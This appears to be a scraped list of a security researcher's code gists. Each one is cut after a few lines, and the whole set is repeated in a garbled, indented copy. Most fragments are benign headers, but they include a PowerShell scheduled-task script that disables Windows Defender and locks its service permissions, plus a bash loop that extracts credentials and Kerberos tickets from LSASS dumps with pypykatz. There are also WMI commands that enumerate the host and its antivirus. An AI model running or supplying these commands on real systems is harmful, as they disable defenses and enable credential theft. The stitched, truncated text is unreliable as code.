TheWover

## wmic_cmds.txt
Host Enumeration:

--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

wmic computersystem LIST full

--- Anti-Virus ---

wmic /namespace:\\root\securitycenter2 path antivirusproduct

## win32_hook.h
/*
 * EAT-based hooking for x86/x64.
 *
 * Big thanks to ez (https://github.com/ezdiy/) for making this!
 *
 * Creates "hooks" by modifying the module's export address table.
 * The procedure works in three main parts:
 *
 * 1. Reading the module's PE file and getting all exported functions.
 * 2. Finding the right function to "hook" by simple address lookup

## winfork.c
/*
 * fork.c
 * Experimental fork() on Windows.  Requires NT 6 subsystem or
 * newer.
 *
 * Copyright (c) 2012 William Pitcock <nenolod@dereferenced.org>
 *
 * Permission to use, copy, modify, and/or distribute this software for any
 * purpose with or without fee is hereby granted, provided that the above
 * copyright notice and this permission notice appear in all copies.

## process_list_without_handles.cpp
/*
*
* List process information on windows without opening any handles, including process architecture and username
*
*/

#include <Windows.h>
#include <stdio.h>
#include <math.h>

## doh.ps1
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'

$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a

$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()

$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')

## appify
#!/bin/bash

if [ "$1" = "-h" -o "$1" = "--help" -o -z "$1" ]; then cat <<EOF
appify v3.0.1 for Mac OS X - http://mths.be/appify
Creates the simplest possible Mac app from a shell script.

Appify takes a shell script as its first argument:

    `basename "$0"` my-script.sh

## winflate.c
/**
  BSD 3-Clause License

  Copyright (c) 2019 Odzhan. All rights reserved.

  Redistribution and use in source and binary forms, with or without
  modification, are permitted provided that the following conditions are met:

  * Redistributions of source code must retain the above copyright notice, this
    list of conditions and the following disclaimer.

## xpress.c
/**
  BSD 3-Clause License

  Copyright (c) 2019 Odzhan. All rights reserved.

  Redistribution and use in source and binary forms, with or without
  modification, are permitted provided that the following conditions are met:

  * Redistributions of source code must retain the above copyright notice, this
    list of conditions and the following disclaimer.

## clr_via_native.c
#include "stdafx.h"

int main()
{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;

## mymykat.sh
#!/bin/bash
# prereqs: pypykatz, all the dumps in current working dir

mkdir ./ppktz_tickets 2>/dev/null
ext='.dmp'

for i in *$ext; do
    txtfile=${i::-3}txt
    secrets=${i::-3}secrets
    pypykatz lsa minidump $i -o $txtfile -k ./ppktz_tickets/;
	Host Enumeration:

	--- OS Specifics ---
	wmic os LIST Full (* To obtain the OS Name, use the "caption" property)

	wmic computersystem LIST full

	--- Anti-Virus ---

	wmic /namespace:\\root\securitycenter2 path antivirusproduct
	/*
	* EAT-based hooking for x86/x64.
	*
	* Big thanks to ez (https://github.com/ezdiy/) for making this!
	*
	* Creates "hooks" by modifying the module's export address table.
	* The procedure works in three main parts:
	*
	* 1. Reading the module's PE file and getting all exported functions.
	* 2. Finding the right function to "hook" by simple address lookup
	/*
	* fork.c
	* Experimental fork() on Windows. Requires NT 6 subsystem or
	* newer.
	*
	* Copyright (c) 2012 William Pitcock <nenolod@dereferenced.org>
	*
	* Permission to use, copy, modify, and/or distribute this software for any
	* purpose with or without fee is hereby granted, provided that the above
	* copyright notice and this permission notice appear in all copies.
	/*
	*
	* List process information on windows without opening any handles, including process architecture and username
	*
	*/

	#include <Windows.h>
	#include <stdio.h>
	#include <math.h>
	$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'

	$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
	Register-ScheduledTask -TaskName 'TestTask' -Action $a

	$svc = New-Object -ComObject 'Schedule.Service'
	$svc.Connect()

	$user = 'NT SERVICE\TrustedInstaller'
	$folder = $svc.GetFolder('\')
	#!/bin/bash

	if [ "$1" = "-h" -o "$1" = "--help" -o -z "$1" ]; then cat <<EOF
	appify v3.0.1 for Mac OS X - http://mths.be/appify
	Creates the simplest possible Mac app from a shell script.

	Appify takes a shell script as its first argument:

	`basename "$0"` my-script.sh
	/**
	BSD 3-Clause License

	Copyright (c) 2019 Odzhan. All rights reserved.

	Redistribution and use in source and binary forms, with or without
	modification, are permitted provided that the following conditions are met:

	* Redistributions of source code must retain the above copyright notice, this
	list of conditions and the following disclaimer.
	#include "stdafx.h"

	int main()
	{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;
	#!/bin/bash
	# prereqs: pypykatz, all the dumps in current working dir

	mkdir ./ppktz_tickets 2>/dev/null
	ext='.dmp'

	for i in *$ext; do
	txtfile=${i::-3}txt
	secrets=${i::-3}secrets
	pypykatz lsa minidump $i -o $txtfile -k ./ppktz_tickets/;